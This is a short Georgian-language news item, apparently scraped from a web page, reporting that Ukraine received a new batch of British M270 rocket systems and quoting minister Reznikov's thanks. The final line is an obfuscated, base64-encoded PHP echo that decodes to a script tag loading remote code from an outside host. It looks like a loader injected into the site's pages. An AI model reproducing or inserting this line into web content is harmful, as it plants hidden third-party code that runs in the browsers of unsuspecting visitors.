celsiusi
ავერსი საქკაბელი
უკრაინამ ბრიტანეთისგან მორიგი სამხედრო დახმარება მიიღო.
 
უკრაინის თავდაცვის მინისტრის, ალექსეი რეზნიკოვის განცხადებით, ქვეყანაში უკვე ჩავიდა ზალპური ცეცხლის რეაქტიული სისტემა „ემ 270“-ის (M270) ახალი პარტია.
 
„მადლობა ბენ უოლასს და დიდი ბრიტანეთის ყველა მოქალაქეს! თქვენი მხარდაჭერა ძალიან მნიშვნელოვანია უკრაინისთვის. ჩვენი არმია ოსტატურად იყენებს ამ „შევსებას“ ბრძოლის ველზე. მეტი საჩუქრები მალე იქნება“, – თქვა რეზნიკოვმა.
 
ბრიტანული სარაკეტო სისტემები სამიზნეებს დაახლოებით 80 კილომეტრის მანძილზე ანადგურებს.
520
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");